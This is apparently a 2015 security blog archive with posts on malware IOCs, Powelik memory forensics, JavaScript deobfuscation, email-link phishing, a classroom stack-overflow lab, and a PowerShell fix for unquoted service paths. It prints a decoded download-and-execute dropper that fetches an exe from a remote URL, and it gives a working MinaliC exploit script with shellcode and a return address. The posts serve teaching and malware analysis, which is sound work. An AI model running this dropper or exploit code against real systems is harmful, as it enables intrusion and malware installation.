Wednesday, February 25, 2015

What to do with MD5 checksums of files provided as an Indicator of Compromise?

As I have researched malware and the indicators of compromise an MD5 checksum of the files are provided so that you can detect them in your environment.  I am not sure about your anti-virus but I am not able to plug-in an MD5 and have it search for them across the enterprise as it does it's scan.  Though the company I work with states that is a feature request that they have.

Let's say I am researching the Dyre Banking Trojan and I pull up SecureWorks report about it located at  As I scan through the report I come to the following section listing the MD5 checksums of the files I should look for on my enterprise network.

This is where Clam-AV can assist.  You can create a custom database with these MD5 hashes.  The format for a custom database with MD5's is hash:file size:malware name.  So I then create the file as follows:


However, I quickly notice that I do not have the file size.  I started to research to see if I could add a wildcard for the file size and came across this in the ClamAV documentation.

The above information allows a wild card for the file size.  So then I create my custom database with the extension of .hsb as follows.

Then to utilize the database that I created I use the following command of 'clamscan -i -r -d test.hsb'.  With the -i it only shows the infected files, -r is recursive, -d is the directory or file where my databases exist.  If it finds a file that matches the custom dictionary that I came up with then it will have .UNOFFICIAL next to it as shown below in the picture.

With being able to customize the database you could on a linux host where clamav is installed mount a remote windows share or administrative share and scan for the hashes that are of interest.  Thus adding one more tool in your toolset...

Friday, February 20, 2015

Volatility Script to Extract the Registry Keys where Powelik is Stored

Below is a bash script that will analyze the dllhost.exe process for the registry entries that could contain the Powelik trojan.  If it detects the entry it will attempt to dump the registry keys where the powelik malware would be located.

# Script to collect information by utilizing volatility
# Script is built to quickly identify the Powelik Trojan until the malware changes

####  Configurable Settings #############

if [ ! -d $outputDir ]; then
    mkdir $outputDir
    mkdir $outputDir/vaddump
    mkdir $dumpDir
    mkdir $tempDir

# Find the profile for the image that is being analyzed and store it in volProfile
python $locVolPy -f $memImage imageinfo > $outputDir/imageinfo
cat $outputDir/imageinfo | grep "Suggested Profile(s)" | awk '{print "Identified Profile: " $4}' | sed 's/,//'
volProfile=`cat $outputDir/imageinfo | grep "Suggested Profile(s)" | awk '{print $4}' | sed 's/,//'`

# Run the following volatility plugins to identify the dllhost.exe process ID and the hivelist
for pluginCommand in pslist hivelist
    echo "Running $pluginCommand and saving results to $outputDir/$pluginCommand"
    python $locVolPy -f $memImage --profile=$volProfile $pluginCommand > $outputDir/$pluginCommand

# Identify the Process ID of dllhost.exe
processID=`cat output/pslist | grep -i "dllhost.exe" | awk '{print $3}'`
if [ $processID ]; then
    echo "dllhost.exe was found at the following processID: $processID"
    echo "dllhost.exe Process ID was not found in the pslist..."

# With the Process ID of dllhost lets do a vaddump of the process
python $locVolPy -f $memImage --profile=$volProfile vaddump -p $processID -D $outputDir/vaddump

# Search the vaddump of the process for strings that match a clsid regular expression
for regEntry in $(strings $outputDir/vaddump/* | egrep -i -e 'clsid\\\{[0-9A-Fa-f-]{36}\}\\localserver32')
    echo "Found the following clsid registry entry in the vaddump: $regEntry"
    #echo ${regEntry:17}
    # Find the virtual offset for the registry hives for the users on the computer
    for virtualOffset in $(cat $outputDir/hivelist | grep -i "UsrClass.dat" | awk '{print $1}')
        echo "Found the virtual offset for the user at $virtualOffset"
        echo "Attempting to dump the registry value using volatility if it exists for the user..."
        python $locVolPy -f $memImage --profile=$volProfile printkey -o $virtualOffset -K "${regEntry:17}"

echo ""
echo "If the Powelik was identified you should see a bunch of randomness above..."
echo ""


Notes on Malware Analysis of the Trojan Powelik

Working with the Powelik Malware today, I thought I would record some of my notes so I could refer back to how I utilized volatility and other tools.

To find the malware it is embedded in the registry under a random key at the following location:


To further identify that, you can google various other pages that have an analysis online about Powelik.  Another way to find the registry key is to conduct a vaddump on the process of dllhost.exe which powelik utilizes: -f mem.dump --profile=Win7SP0x86 vaddump -p <processid of dllhost.exe> -D <output>

Then search for signs of the CLSID\{<random>} registry key using the following command:

strings <output>* | grep -i -e "CLSID"

To extract the malware I used volatility to first identify where the registry hives are located: -f mem.dump --profile=Win7SP0x86 hivelist

This gives you the virtual offset for the UsrClass.dat file for the user.  Then you can use that to pull the registry key that I am looking for: -f mem.dump --profile=Win7SP0x86 printkey -o 0xb5d54ae3 -K "CLSID\{<random>}\LocalServer32"

With the output from the (Default) key and one that has an "a" I can see the malware embedded as the value of a.  The malware is encoded multiple times and to decode it the first time I utilized the "Microsoft Script Encoder".  An interesting tool that developers can utilize with Javascript and VBScript.

After decoding it initially you then see another section that needs to be base64 decoded, then another, and another.  Through decoding it a couple of times the IP Addresses and domains that the malware calls home to are displayed:,,,,,

Then after decoding it a few times too many using foremost will pop-out a dll.  This dll then can be uploaded to virustotal and it is confirmed that this is Powelik.

Deobfuscating Javascript

Today I came across some javascript madness inside of a file that initially appears as a Word Document in an email.  Below is a picture of some of the madness:

var a=''; var b=''; function lq() { b = 'eval'; a += 'ADODB'; tqk(); }; function j() { b = 'eval'; a += 's.Exp'; eky(); }; function ye() { b = 'eval'; a += 'ti'; xk(); }; function rbx() { b = 'eval'; a += '357'; dke(); }; function mx() { b = 'eval'; a += 'ment'; fr(); }; function jp() { b = 'eval'; a += '+St'; rxh(); }; function uuz() { b = 'eval'; a += ' ca'; d(); };

As you can tell little pieces of the actual code scattered everywhere.  To first deobfuscate the code I placed a line break between each semi-colon and new function.

cat file.txt | sed 's/function/\nfunction/g'

The above command just does a string substitution adding a new line in before the function call.  Then I noticed the variable b='eval' never changes.  So I removed it from the functions using sed once again:

cat newfile.txt | sed "s/b = 'eval';//"

Then after the code is assembled I knew it would execute in some fashion so looking through the code I found a line of this[b](a);.  I modified the line in the code to read document.write(a) and then in a sandbox ran the javascript.

The output of the deofuscated code came out to be the below code:

function dl(fr,fn,rn)
+++ var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+fn; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function() { if (xo.readyState === 4) { var xa = new ActiveXObject("ADODB.Stream");; xa.type = 1; xa.write(xo.ResponseBody); xa.position = 0; xa.saveToFile(fn,2); xa.close(); }; }; try {"GET",fr,false); xo.send(); if (rn > 0) { ws.Run(fn,0,0); }; } catch (er) { }; }; dl("hyyp://<random number>&rnd=<random number>","69923439.exe",1)

The above javascript will create a file in the temp directory using wscript called 69923439.exe if it can download the file located at the URL listed.

The goal of this post was to display the deobfuscation of the badness.

Monday, February 16, 2015

Links inside of Emails - The good, the bad and the ugly...

So I was listening to the following podcast and it began discussing a question about links inside of emails.  I have pasted from the transcribed notes the discussion below.  Thanks Steve and Leo for the great podcast. 


SERIES:  Security Now!
DATE:  February 10, 2015
TITLE:  Listener Feedback #206
SPEAKERS: Steve Gibson & Leo Laporte

"...LEO: Justin Aborn in Boston. He wants to know how to be sure about emailed links. He wants to know how whether to click on them: My bank just emailed me a clickable link. I'm 99.9% sure it's truly them, but I navigate to their site by hand, rather than click on the emailed link. To check the fit of my tinfoil hat, what do you recommend as the minimum procedure to confidently click an emailed URL? It would be a lot more convenient if we could just click on them.

STEVE:  Yeah.  And I liked this also because in the context of Anthem, as you said, Leo, we're seeing now a big phishing wave of fake email coming out.  The only way, I mean, the old-school way is to look at the email headers, which are generally available.  But, boy, that's confusing.  And headers are highly prone to being spoofed.  I think the only thing I could suggest, first of all, is don't.  They're just, you know, it's really not worth it.  But if you have to, what you need to do is look at the source.  That is, you need to be able to examine the source of the email.

The problem is that email today is HTML.  And there's what you see is the result of the HTML markup which has created a presentation.  And so you can see text that is underlined that says "Click here to email Anthem."  Or I don't think he gave an example.  Or his bank.  And in fact it can even show you, like with no typos, exactly that URL, except that that's the presentation of the HTML.  The markup is in brackets on either side of that, and it's hidden from you, by design, by the browser.  By the browser or now, you know, email has become HTML, so your email client is hiding that on purpose to give you a nice, visible, simplified link to click on.

So it's only by looking at the source that you can verify the actual URL that you're going to click on, if you did.  And you might very well see that inside of brackets where on the left-hand side there is, which is the actual URL that you will visit if you click that link.  It's only by looking at the source that you can know.  And the other problem is scripting gets involved, too, because there could be an on-click phrase, even if the href, as it's called, is correct.  If there was an on-click, it turns out the JavaScript gets invoked before the href in the link is visited.

I just was dealing with all of this, as it happens, because I've added automation to the SQRL demo so that when you authenticate with a client the web page, the SQRL demo web page immediately, instantly updates itself to show you that you're now logged in.  So I was visiting all this.  And the JavaScript is invoked first.  And that could be in an included library that you don't even see.  So, boy.  Unfortunately, the bad guys have a real advantage here.  And I hope maybe I've made the case for my first recommendation, which is don't, because...

LEO:  So a number of people in the chatroom are saying in some email clients, if, for instance, you hover your mouse over the - the real problem is that the presentation layer is HTML.  That hides what the actual link is, even if it looks like it's a link, as you said.  But if you hover your mouse over that, can you capture on hover in JavaScript and prevent the status line from showing the actual URL?  Or am I going to see the actual URL in the status line at that point?

STEVE:  Whether it was in the status line, or sometimes it comes up as a little toolkit right there.

LEO:  As a toolkit, right.

STEVE:  Right.  Unfortunately, that will show you the static href, not the on-click call.

LEO:  On-click.

STEVE:  Yes.

LEO:  And that's what you're going to go to is what happens when you click.

STEVE:  Yes.

LEO:  So it can actually be so obfuscated that it's in JavaScript.

STEVE:  Even that, right.

LEO:  And you can, you know, you say, well, view source.  But even then the JavaScript could be further obfuscated.

STEVE:  Oh, yeah.

LEO:  You wouldn't see anything that says HTTP.  You might see just nonsense.

STEVE:  Yeah.

LEO:  Wow.  So hovering is not going to do it.

STEVE:  Not even that.

LEO:  You really just shouldn't.  You should, I guess, what you should do is manually go to the website, by hand enter the URL.

STEVE:  I really think, yes, in fact, I think that that's...

LEO:  So right-click, copy, and paste isn't going to do it, either.

STEVE:  Nope.  It won't because you're actually, you're going to execute code as a result of clicking on that.

LEO:  Wow.

STEVE:  Yeah.

LEO:  Isn't that amazing.  That's great.  That's - I think, frankly, turn off HTML email, period.  It shouldn't be allowed.  It's a bad idea.

STEVE:  And scripting in email.  I mean, how much malware has crawled into people's machines from email scripting?

LEO:  Yeah, yeah, yeah.  A good email client will not do HTML.  Unfortunately, most of us now use web browsers to do email.

STEVE:  Right.

LEO:  Which means you're screwed.

STEVE:  Right.  Basically you are...

LEO:  Don't click that link.

STEVE:  You're receiving a web page from someone you have no control over, you don't know who they are, they're claiming to be somebody who is working in your benefit.  The best advice, and I don't remember where it originated, if it was from Brian Krebs or someone else, but I loved it, and we've discussed it here through the years, and that is never do something that you didn't go in search of.  If a popup says, oh, you need to update your Flash Player, no.  If you weren't going, if you didn't have some reason to go looking to update your Flash Player, don't accept an offer to do so.  You just can't do that safely..."

I completely understand the impact that javascript can have on a webpage and how it can manipulate html elements.  I find that Outlook, Outlook Web Access and many other clients block scripting in the email client.  

Below is a quick proof-of-concept showing an HTML page that has a link with an onclick event that will manipulate the link as it is clicked.  If it was in an html page by itself the link would be manipulated and take you to verses  So for this example I emailed the page to myself.

I used php and an email relay to send the message with the link to my Outlook client.  Then the email showed up and I was able to click the link, however, due to the way outlook renders the HTML email the script tag and the onclick element is not recognized.

As more research can be done certain HTML is blocked because of the way mail clients render the html. 

Another issue with webmail clients is the way they will redirect to links.  This makes it more difficult to see where you are actually going.  For example here is the screenshot of the above email opened in outlook web access.  As you hover over the link it is somewhat masqueraded by the mail client itself.

While we are discussing issues.  On mobile devices as you hover over links they do not give an indication of where they are going before you click on them. Again emphasizing your point of not clicking on links in emails. 

As I have told people not to click on links in emails, the user then returns to his computer and looks at his emails and notices 80% or more have links inside of them, most of which they need to conduct business.  

What is the best strategy to educate people to not click on links? Is that even a strategy? 

I have found educating people about phishing emails is a layered approach containing but not limited to the following steps:
1. Consider who the email is from, is it someone you know.
2. What is the content of the email? 
3. Are you expecting the email
4. Is the information in the email expected from the source you received it?
5. If the information is important can I call or text them as an out-of-band authentication of the email
6. Is the grammar in the email expected.
7. Showing them phishing emails and what to look for.
8. Test, Test, and Retest phishing employees to verify they understand the concepts you are teaching and enforcing.

A few thoughts that I had on the podcast as I listened to the last question and answer session.

Fuzzing to Stack Based Overflow Exploit with MinaliC

For the computer science class that I am teaching I introduced stack based overflows.  To demonstrate the concept I utilized vulnserver.exe and mentioned it in previous blog posts.  This lab involved MinaliC.

You can refer to the following web site for the exploit  We are going to step through this.  Also the exploit published is for XP SP2 Pro we will be using XP SP1.

1. We first run the MinaliC webserver on Windows XP SP1.  The vulnerable application can be downloaded from the link above.

2.  Then I am going to use python to connect to the web page to pull down the above page and we will start there.


import socket

server = '' # Change to the IP Address of Windows XP SP1 VM
destPort = 8080

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, destPort))

pageRequest = 'index.htm'
hostInfo = ''

httpRequest =  'GET /' + pageRequest + ' HTTP/1.1\r\n' 
httpRequest += 'Host: ' + hostInfo + '\r\n\r\n'
print httpRequest
print s.recv(1024)


3. Here is the output of the above python script showing an HTTP 200 of a successful page was pulled down

GET /index.htm HTTP/1.1

HTTP/1.1 200 OK
Date: Thu, 12 Feb 2015 21:37:10 GMT
Content-Length: 349
Content-Type: text/html
Last-Modified: Thu, 12 Feb 2015 21:37:10 GMT
Server: MinaliC
Connection: Close
Set-Cookie: session_id=8GHvdwfQ1u0xGJbMdZi7CT62G5CbxK;

4.  Now I am going to change the python code to begin fuzzing the webserver.  I will utilize the page that is pulled by GET /<Fuzz and see how long the buffer is> HTTP/1.1


import socket

server = '' # Change to the IP Address of Windows XP SP1 VM
destPort = 8080

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, destPort))

#pageRequest = 'index.htm'
pageRequest = "A"*150
hostInfo = ''

httpRequest =  'GET /' + pageRequest + ' HTTP/1.1\r\n' 
httpRequest += 'Host: ' + hostInfo + '\r\n\r\n'
print httpRequest
print s.recv(1024)




HTTP/1.1 404 Not Found
Date: Thu, 12 Feb 2015 21:41:17 GMT

5.  So the page came back with a 404 of page not found error.  Let's increase the number of A's sent until we see a crash occur.  As we increase the number of A's sent to 250 we then notice that an HTTP 404 is not returned and actually it appears that it hangs the application.

6.  From here we will attach an Immunity debugger to MinaliC and observe to see if the EIP or the instruction pointer is overwritten with A's.  Looking at the below screenshot we can see it is overwritten.

7.  Now we need to be able to control EIP and identify the length of the buffer prior to inserting the A's into EIP.  We will use the /usr/share/metasploit-framework/tools/pattern_create.rb tool to generate a pattern that is 250 characters long and pass it through python.  Then look at the registers and determine the length of the buffer using pattern_offset.rb in the tools directory also.


import socket

server = '' # Change to the IP Address of Windows XP SP1 VM
destPort = 8080

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, destPort))

#pageRequest = 'index.htm'
#pageRequest = "A"*250
# /usr/share/metasploit-framework/tools/pattern_create.rb 250
pageRequest = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A"
hostInfo = ''

httpRequest =  'GET /' + pageRequest + ' HTTP/1.1\r\n' 
httpRequest += 'Host: ' + hostInfo + '\r\n\r\n'
print httpRequest
print s.recv(1024)


8. Observe by running the above python script you receive a crash of the application and the EIP is populated.

9. Then use the metasploit tool pattern_offset.rb to determine the size of the buffer.

10. With the pattern we now can send 245 - A's and 4 - B's.  The B's should line up in the EIP register.  Then we can send 150 - C's in the host area.  In this example we are curious where the 150 C's will end up.  If we can place our shellcode in the C's and have EIP point to where they are located we can execute the shellcode.  If we look to where the EBX register goes it will read the 4 bytes that it is on and then go to the memory address where the C's will be located.

11. Here is the python code for the above proof-of-concept that was written:


import socket

shellcode = (
"\x31\xd2\x52\x68\x63\x61\x6c\x63\x89\xe6\x52\x56\x64\x8b\x72" +
"\x30\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\x8b\x5f" +
"\x3c\x8b\x5c\x1f\x78\x8b\x74\x1f\x20\x01\xfe\x8b\x4c\x1f\x24" +
"\x01\xf9\x0f\xb7\x2c\x51\x42\xad\x81\x3c\x07\x57\x69\x6e\x45" +

junk = "\x42" * 245
# 0x77c18cc8 jmp ebx
# 0x77c194a5 jmp ebx
returnAddr = "\xc8\x8c\xc1\x77"
host = "\x90"*30 + shellcode + "\x90"*31

httpRequest = "GET /" + junk + returnAddr + " HTTP/1.1\r\n"
httpRequest += "Host: " + host + "\r\n\r\n"

s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 8080))


12. A quick proof-of-concept to demonstrate stack based overflows.

Netflix Streaming Blocked by Sophos UTM

*** This solution no longer works with updates that Sophos has applied or changes that Netflix has made!

I was helping a friend with a Sophos UTM and found that netflix would not stream on their mobile devices.  We went into the settings and through studying the weblog and how netflix URL's are put togehter and created the following regex to add an exception so the AV would not scan the URL:


Below is a screenshot of the exception that was created:

Now as long as the bot masters do not create a bot that uses that regex to exfil data it will work great!!  Oh by-the-way the Sophos UTM is free for home use.  It is a nice Unified Threat Management (UTM) for home use and is a lot better than a router you can buy out of the store.

Friday, February 6, 2015

Updated Powershell Script to Fix Unquoted Path Vulnerabilities

Here is an updated powershell script to fix unquoted path vulnerabilities:

$VulnServices = gwmi win32_service | ?{$_} | where {($_.pathname -ne $null) -and ($_.pathname.trim() -ne "")} | where {-not $_.pathname.StartsWith("`"")} | where {($_.pathname.Substring(0, $_.pathname.IndexOf(".exe") + 4)) -match ".* .*"}


    if ($VulnServices) {

        foreach ($service in $VulnServices){

                                                $out = $


                                                $path = $service.pathname

                                                if(Test-Path ("hklm:\SYSTEM\CurrentControlSet\Services\" + ${

                                                $info = (Get-ItemProperty ("hklm:\SYSTEM\CurrentControlSet\Services\" + $ -Name ImagePath -EA "SilentlyContinue").ImagePath


                                                #Check for quotes

                                                if ($info -eq "`"$path`""){

                                                                #FOR TESTING: Write-Host "Has quotes!" $ $info


                                                #Check for no quotes

                                                elseif ($info -eq $path){

                                                                #FOR TESTING: Write-Host "NO QUOTES!" $info

                                                                Set-ItemProperty ("hklm:\SYSTEM\CurrentControlSet\services\" + $ -Name ImagePath -Value "`"$path`""


                                                #FOR TESTING: $info = (Get-ItemProperty ("hklm:\SYSTEM\CurrentControlSet\Services\" + $ -Name ImagePath -EA "SilentlyContinue").ImagePath

                                                #FOR TESTING: $info




Install Cuckoo Sandbox Notes

I thought I would record my notes on installing the cuckoo sandbox.  These notes do not cover the setting up of the configuration files for the sandboxes. 


# Created to install cuckoo Sandbox on Kali linux
# Taken from:
# Most of what is in the above link worked

#apt-get install python
#apt-get install python-sqlalchemy python-bson

# If the following repositories are not present they need to be added to /etc/apt/sources.list
# From:
#deb kali main non-free contrib
#deb kali/updates main contrib non-free
#deb-src kali main non-free contrib
#deb-src kali/updates main contrib non-free
#deb kali-bleeding-edge main - This will install the kernel 3.18 headers you have to work with this...

# With the bleeding edge it installs the 3.14 linux-image and the 3.18 linux-headers...  Watch out for this mismatch.
#apt-cache search linux-image
#apt-cache search linux-headers

# apt-get upgrade
# apt-get update

## Reboot the Kali workstation

#apt-get install python-libvirt python-dpkt python-pefile python-jinja2 python-magic python-pymongo python-gridfs python-bottle python-chardet

#apt-get install python-pip

#pip install cybox
#pip install jinja2 pymongo bottle pefile django chardet

# Unable to install the below package using pip install ** Error **
#pip install maec==

#apt-get install virtualbox tcpdump

#setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump

#adduser cuckoo
#usermod -G vboxusers cuckoo

#apt-get install ssdeep python-pyrex subversion libfuzzy-dev

#pip install ssdeep

#svn checkout pyssdeep-read-only
#cd pyssdeep-read-only
#python build
#python install
#cd ..

#apt-get install python-pymongo mongodb

#apt-get install g++ libpcre3 libpcre3-dev  # These packages were already installed when I tried

#tar xvzf yara-1.6.tar.gz
#cd yara-1.6
#make check
#make install
#cd ..

#tar xvzf yara-python-1.6.tar.gz
#cd yara-python-1.6
#python build
#python install
#cd ..

#apt-get install git
#git clone git://

Prepare, Bait, Hook, Execute and Control - Buffer Overflows

This post is the third of four that I am planning to write about social engineering specifically about phishing.  The form of phishing that...